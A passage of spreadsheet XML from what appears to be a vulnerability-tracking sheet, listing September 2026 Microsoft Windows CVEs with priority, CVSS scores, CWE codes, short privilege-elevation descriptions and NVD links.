          <t>NVD</t>
        </is>
      </c>
      <c r="O930" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P930" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q930" s="5" t="inlineStr"/>
      <c r="R930" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S930" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T930" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="931">
      <c r="A931" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B931" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C931" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="D931" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E931" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F931" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G931" s="5" t="inlineStr"/>
      <c r="H931" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I931" s="5" t="inlineStr"/>
      <c r="J931" s="5" t="inlineStr"/>
      <c r="K931" s="5" t="inlineStr"/>
      <c r="L931" s="5" t="inlineStr"/>
      <c r="M931" s="5" t="inlineStr"/>
      <c r="N931" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O931" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P931" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q931" s="5" t="inlineStr"/>
      <c r="R931" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="S931" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T931" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="932">
      <c r="A932" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B932" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C932" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="D932" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E932" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F932" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G932" s="5" t="inlineStr"/>
      <c r="H932" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I932" s="5" t="inlineStr"/>
      <c r="J932" s="5" t="inlineStr"/>
      <c r="K932" s="5" t="inlineStr"/>
      <c r="L932" s="5" t="inlineStr"/>
      <c r="M932" s="5" t="inlineStr"/>
      <c r="N932" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O932" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P932" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q932" s="5" t="inlineStr"/>
      <c r="R932" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="S932" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T932" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69448</t>
        </is>
      </c>
    </row>
    <row r="933">
      <c r="A933" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B933" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C933" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69466</t>
        </is>
      </c>
      <c r="D933" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E933" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F933" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G933" s="5" t="inlineStr"/>
      <c r="H933" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I933" s="5" t="inlineStr"/>
      <c r="J933" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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33" s="5" t="inlineStr"/>
      <c r="M933" s="5" t="inlineStr"/>
      <c r="N933" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O933" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P933" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q933" s="5" t="inlineStr"/>
      <c r="R933" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="S933" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="T933" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69466</t>
        </is>
      </c>
    </row>
    <row r="934">
      <c r="A934" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B934" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C934" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69468</t>
        </is>
      </c>
      <c r="D934" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E934" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F934" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G934" s="5" t="inlineStr"/>
      <c r="H934" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I934" s="5" t="inlineStr"/>
      <c r="J934" s="5" t="inlineStr"/>
      <c r="K934" s="5" t="inlineStr"/>
      <c r="L934" s="5" t="inlineStr"/>
      <c r="M934" s="5" t="inlineStr"/>
      <c r="N934" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O934" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P934" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q934" s="5" t="inlineStr"/>
      <c r="R934" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S934" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T934" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69468</t>
        </is>
      </c>
    </row>
    <row r="935">
      <c r="A935" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B935" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C935" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69470</t>
        </is>
      </c>
      <c r="D935" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E935" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F935" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G935" s="5" t="inlineStr"/>
      <c r="H935" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I935" s="5" t="inlineStr"/>
      <c r="J935" s="5" t="inlineStr"/>
      <c r="K935" s="5" t="inlineStr"/>
      <c r="L935" s="5" t="inlineStr"/>
      <c r="M935" s="5" t="inlineStr"/>
      <c r="N935" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O935" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P935" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q935" s="5" t="inlineStr"/>
      <c r="R935" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S935" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T935" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69470</t>
        </is>
      </c>
    </row>
    <row r="936">
      <c r="A936" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B936" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C936" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69472</t>
        </is>
      </c>
      <c r="D936" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E936" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F936" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G936" s="5" t="inlineStr"/>
      <c r="H936" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I936" s="5" t="inlineStr"/>
      <c r="J936" s="5" t="inlineStr"/>
      <c r="K936" s="5" t="inlineStr"/>
      <c r="L936" s="5" t="inlineStr"/>
      <c r="M936" s="5" t="inlineStr"/>
      <c r="N936" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O936" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P936" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q936" s="5" t="inlineStr"/>
      <c r="R936" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S936" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Devices Human Interface allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T936" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69472</t>
        </is>
      </c>
    </row>
    <row r="937">
      <c r="A937" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B937" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C937" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69473</t>
        </is>
      </c>
      <c r="D937" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E937" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F937" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G937" s="5" t="inlineStr"/>
      <c r="H937" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I937" s="5" t="inlineStr"/>
      <c r="J937" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K9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37" s="5" t="inlineStr"/>
      <c r="M937" s="5" t="inlineStr"/>
      <c r="N937" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O937" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P937" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q937" s="5" t="inlineStr"/>
      <c r="R937" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S937" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T937" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69473</t>
        </is>
      </c>
    </row>
    <row r="938">
      <c r="A938" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B938" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C938" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69488</t>
        </is>
      </c>
      <c r="D938" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E938" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F938" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G938" s="5" t="inlineStr"/>
      <c r="H938" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I938" s="5" t="inlineStr"/>
      <c r="J938" s="5" t="inlineStr"/>
      <c r="K938" s="5" t="inlineStr"/>
      <c r="L938" s="5" t="inlineStr"/>
      <c r="M938" s="5" t="inlineStr"/>
      <c r="N938" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O938" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P938" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q938" s="5" t="inlineStr"/>
      <c r="R938" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S938" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T938" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69488</t>
        </is>
      </c>
    </row>
    <row r="939">
      <c r="A939" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B939" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C939" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69492</t>
        </is>
      </c>
      <c r="D939" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E939" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F939" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G939" s="5" t="inlineStr"/>
      <c r="H939" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I939" s="5" t="inlineStr"/>
      <c r="J939" s="5" t="inlineStr"/>
      <c r="K939" s="5" t="inlineStr"/>
      <c r="L939" s="5" t="inlineStr"/>
      <c r="M939" s="5" t="inlineStr"/>
      <c r="N939" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O939" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P939" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q939" s="5" t="inlineStr"/>
      <c r="R939" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S939" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Partition Management Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T939" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69492</t>
        </is>
      </c>
    </row>
    <row r="940">
      <c r="A940" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B940" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C940" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69498</t>
        </is>
      </c>
      <c r="D940" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E940" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F940" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G940" s="5" t="inlineStr"/>
      <c r="H940" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I940" s="5" t="inlineStr"/>
      <c r="J940" s="5" t="inlineStr"/>
      <c r="K940" s="5" t="inlineStr"/>
      <c r="L940" s="5" t="inlineStr"/>
      <c r="M940" s="5" t="inlineStr"/>
      <c r="N940" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O940" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P940" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q940" s="5" t="inlineStr"/>
      <c r="R940" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S940" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T940" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69498</t>
        </is>
      </c>
    </row>
    <row r="941">
      <c r="A941" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B941" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C941" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69500</t>
        </is>
      </c>
      <c r="D941" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E941" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F941" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G941" s="5" t="inlineStr"/>
      <c r="H941" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I941" s="5" t="inlineStr"/>
      <c r="J941" s="5" t="inlineStr"/>
      <c r="K941" s="5" t="inlineStr"/>
      <c r="L941" s="5" t="inlineStr"/>
      <c r="M941" s="5" t="inlineStr"/>
      <c r="N941" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O941" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P941" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q941" s="5" t="inlineStr"/>
      <c r="R941" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S941" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T941" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69500</t>
        </is>
      </c>
    </row>
    <row r="942">
      <c r="A942" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B942" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C942" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69501</t>
        </is>
      </c>
      <c r="D942" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E942" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F942" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G942" s="5" t="inlineStr"/>
      <c r="H942" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I942" s="5" t="inlineStr"/>
      <c r="J942" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K942" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L942" s="5" t="inlineStr"/>
      <c r="M942" s="5" t="inlineStr"/>
      <c r="N942" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O942" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P942" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q942" s="5" t="inlineStr"/>
      <c r="R942" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S942" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T942" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69501</t>
        </is>
      </c>
    </row>
    <row r="943">
      <c r="A943" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B943" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C943" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69516</t>
        </is>
      </c>
      <c r="D943" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E943" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F943" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G943" s="5" t="inlineStr"/>
      <c r="H943" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I943" s="5" t="inlineStr"/>
      <c r="J943" s="5" t="inlineStr"/>
      <c r="K943" s="5" t="inlineStr"/>
      <c r="L943" s="5" t="inlineStr"/>
      <c r="M943" s="5" t="inlineStr"/>
      <c r="N943" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O943" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P943" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q943" s="5" t="inlineStr"/>
      <c r="R943" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S943" s="5" t="inlineStr">
        <is>
          <t>Use after free in Connected Devices Platform Service (Cdpsvc) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T943" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69516</t>
        </is>
      </c>
    </row>
    <row r="944">
      <c r="A944" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B944" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C944" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69517</t>
        </is>
      </c>
      <c r="D944" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E944" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F944" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G944" s="5" t="inlineStr"/>
      <c r="H944" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I944" s="5" t="inlineStr"/>
      <c r="J944" s="5" t="inlineStr"/>
      <c r="K944" s="5" t="inlineStr"/>
      <c r="L944" s="5" t="inlineStr"/>
      <c r="M944" s="5" t="inlineStr"/>
      <c r="N944" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O944" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P944" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q944" s="5" t="inlineStr"/>
      <c r="R944" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S944" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Wireless Networking allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T944" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69517</t>
        </is>
      </c>
    </row>
    <row r="945">
      <c r="A945" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B945" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C945" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69540</t>
        </is>
      </c>
      <c r="D945" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E945" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F945" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G945" s="5" t="inlineStr"/>
      <c r="H945" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I945" s="5" t="inlineStr"/>
      <c r="J945" s="5" t="inlineStr"/>
      <c r="K945" s="5" t="inlineStr"/>
      <c r="L945" s="5" t="inlineStr"/>
      <c r="M945" s="5" t="inlineStr"/>
      <c r="N945" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O945" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P945" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q945" s="5" t="inlineStr"/>
      <c r="R945" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S945" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T945" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69540</t>
        </is>
      </c>
    </row>
    <row r="946">
      <c r="A946" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B946" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C946" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69549</t>
        </is>
      </c>
      <c r="D946" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E946" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F946" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G946" s="5" t="inlineStr"/>
      <c r="H946" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I946" s="5" t="inlineStr"/>
      <c r="J946" s="5" t="inlineStr"/>
      <c r="K946" s="5" t="inlineStr"/>
      <c r="L946" s="5" t="inlineStr"/>
      <c r="M946" s="5" t="inlineStr"/>
      <c r="N946" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O946" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P946" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q946" s="5" t="inlineStr"/>
      <c r="R946" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-200</t>
        </is>
      </c>
      <c r="S946" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T946" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69549</t>
        </is>
      </c>
    </row>
    <row r="947">
      <c r="A947" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B947" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C947" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69560</t>
        </is>
      </c>
      <c r="D947" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E947" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F947" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G947" s="5" t="inlineStr"/>
      <c r="H947" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I947" s="5" t="inlineStr"/>
      <c r="J947" s="5" t="inlineStr"/>
      <c r="K947" s="5" t="inlineStr"/>
      <c r="L947" s="5" t="inlineStr"/>
      <c r="M947" s="5" t="inlineStr"/>
      <c r="N947" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O947" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P947" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q947" s="5" t="inlineStr"/>
      <c r="R947" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S947" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Work Folder Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T947" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69560</t>
        </is>
      </c>
    </row>
    <row r="948">
      <c r="A948" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B948" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C948" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69563</t>
        </is>
      </c>
      <c r="D948" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E948" s="5" t="inlineStr">
        <is>
